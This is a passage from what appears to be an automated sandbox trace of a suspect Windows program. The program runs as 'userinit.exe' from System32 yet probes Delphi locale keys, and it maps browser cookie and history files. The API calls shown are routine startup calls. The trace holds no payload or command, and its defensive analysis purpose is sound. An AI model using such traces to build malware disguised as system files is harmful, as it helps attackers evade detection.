filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 3058
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 3059
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 3060
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 3061
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 3079
start_va = 0x340000
end_va = 0x37ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000340000"
filename = ""
Region:
id = 3080
start_va = 0x2d40000
end_va = 0x2e3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002d40000"
filename = ""
Region:
id = 3081
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 3082
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 3083
start_va = 0x2e40000
end_va = 0x310efff
entry_point = 0x2e40000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 3087
start_va = 0x380000
end_va = 0x381fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000380000"
filename = ""
Region:
id = 3088
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 3089
start_va = 0x390000
end_va = 0x390fff
entry_point = 0x390000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 3090
start_va = 0x3a0000
end_va = 0x3a1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003a0000"
filename = ""
Region:
id = 3091
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 3092
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 3093
start_va = 0x390000
end_va = 0x390fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000390000"
filename = ""
Region:
id = 3094
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 3095
start_va = 0x3c0000
end_va = 0x3ebfff
entry_point = 0x3c0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 3096
start_va = 0x3f0000
end_va = 0x3f7fff
entry_point = 0x3f0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 3097
start_va = 0x570000
end_va = 0x57ffff
entry_point = 0x570000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 3098
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 3099
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 3100
start_va = 0x3110000
end_va = 0x32cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003110000"
filename = ""
Region:
id = 3103
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 3104
start_va = 0x8c0000
end_va = 0x93ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 3105
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 3106
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 3107
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 3108
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 3109
start_va = 0x2c00000
end_va = 0x2cbffff
entry_point = 0x2c00000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 229
os_tid = 0xf78
[0097.049] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0097.050] GetKeyboardType (nTypeFlag=0) returned 4
[0097.050] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0097.050] GetStartupInfoA (in: lpStartupInfo=0x22fb74 | out: lpStartupInfo=0x22fb74*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0097.050] GetVersion () returned 0x1db10106
[0097.050] GetVersion () returned 0x1db10106
[0097.050] GetCurrentThreadId () returned 0xf78
[0097.050] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x22f670, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0097.050] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f54b, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0097.050] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x22f660 | out: phkResult=0x22f660*=0x0) returned 0x2
[0097.050] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x22f660 | out: phkResult=0x22f660*=0x0) returned 0x2
[0097.050] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x22f660 | out: phkResult=0x22f660*=0x0) returned 0x2
[0097.050] lstrcpynA (in: lpString1=0x22f54b, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0097.050] GetThreadLocale () returned 0x409
[0097.050] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x22f65b, cchData=5 | out: lpLCData="ENU") returned 4
[0097.051] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0097.051] lstrcpynA (in: lpString1=0x22f568, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0097.051] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0097.051] lstrcpynA (in: lpString1=0x22f568, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0097.051] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0097.051] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0097.052] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x5e3640
[0097.052] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x470000
[0097.052] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x5e4640
[0097.052] VirtualAlloc (lpAddress=0x470000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x470000
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0097.052] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0097.053] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0097.053] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0097.053] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0097.053] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0097.053] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0097.053] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0097.053] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0097.053] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0097.053] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0097.053] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0097.053] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0097.053] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x22f794, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0097.053] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x22f780, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0097.053] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x22f780, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0097.053] GetVersionExA (in: lpVersionInformation=0x22fb18*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22fb18*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0097.053] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0097.053] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0097.053] GetThreadLocale () returned 0x409
[0097.053] GetThreadLocale () returned 0x409
[0097.053] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Jan") returned 4
[0097.053] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="January") returned 8
[0097.053] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Feb") returned 4
[0097.053] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="February") returned 9
[0097.053] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Mar") returned 4
[0097.053] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="March") returned 6
[0097.053] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Apr") returned 4
[0097.053] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="April") returned 6
[0097.053] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="May") returned 4
[0097.053] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="May") returned 4
[0097.053] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Jun") returned 4
[0097.053] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="June") returned 5
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Jul") returned 4
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="July") returned 5
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Aug") returned 4
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="August") returned 7
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Sep") returned 4
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="September") returned 10
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Oct") returned 4
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="October") returned 8
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Nov") returned 4
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="November") returned 9
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Dec") returned 4
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="December") returned 9
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Sun") returned 4
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Sunday") returned 7
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Mon") returned 4
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Monday") returned 7
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Tue") returned 4
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Tuesday") returned 8
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Wed") returned 4
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Wednesday") returned 10
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Thu") returned 4
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Thursday") returned 9
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Fri") returned 4
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Friday") returned 7
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Sat") returned 4
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x22f9f0, cchData=256 | out: lpLCData="Saturday") returned 9
[0097.054] GetThreadLocale () returned 0x409
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x22fa4c, cchData=256 | out: lpLCData="$") returned 2
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x22fa4c, cchData=256 | out: lpLCData="0") returned 2
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x22fa4c, cchData=256 | out: lpLCData="0") returned 2
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x22fb44, cchData=2 | out: lpLCData=",") returned 2
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x22fb44, cchData=2 | out: lpLCData=".") returned 2
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x22fa4c, cchData=256 | out: lpLCData="2") returned 2
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x22fb44, cchData=2 | out: lpLCData="/") returned 2
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x22fa4c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0097.054] GetThreadLocale () returned 0x409
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x22fa18, cchData=256 | out: lpLCData="1") returned 2
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x22fa4c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0097.054] GetThreadLocale () returned 0x409
[0097.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x22fa18, cchData=256 | out: lpLCData="1") returned 2
[0097.055] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x22fb44, cchData=2 | out: lpLCData=":") returned 2
[0097.055] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x22fa4c, cchData=256 | out: lpLCData="AM") returned 3
[0097.055] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x22fa4c, cchData=256 | out: lpLCData="PM") returned 3
[0097.055] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x22fa4c, cchData=256 | out: lpLCData="0") returned 2
[0097.055] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x22fa4c, cchData=256 | out: lpLCData="0") returned 2
[0097.055] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x22fa4c, cchData=256 | out: lpLCData="0") returned 2
[0097.055] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x22fb44, cchData=2 | out: lpLCData=",") returned 2
[0097.055] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0097.055] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0097.055] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0097.055] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0097.055] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0097.055] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0097.055] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0097.055] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0097.055] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0097.055] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0097.055] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0097.055] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0097.055] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0097.055] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0097.056] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0097.056] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0097.056] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0097.056] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0097.056] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0097.056] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0097.056] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0097.056] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0097.056] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0097.056] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0097.056] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0097.056] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0097.056] GetDC (hWnd=0x0) returned 0xe010895
[0097.056] GetDeviceCaps (hdc=0xe010895, index=90) returned 96
[0097.056] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0097.057] GetDC (hWnd=0x0) returned 0xe010895
[0097.057] GetDeviceCaps (hdc=0xe010895, index=104) returned 0
[0097.057] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0097.057] CreatePalette (plpal=0x22f7a8) returned 0x2308085b
[0097.057] GetStockObject (i=7) returned 0x1b00017
[0097.057] GetStockObject (i=5) returned 0x1900015
[0097.057] GetStockObject (i=13) returned 0x18a002e
[0097.057] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0097.057] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0097.057] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0097.057] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x22f7a4, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
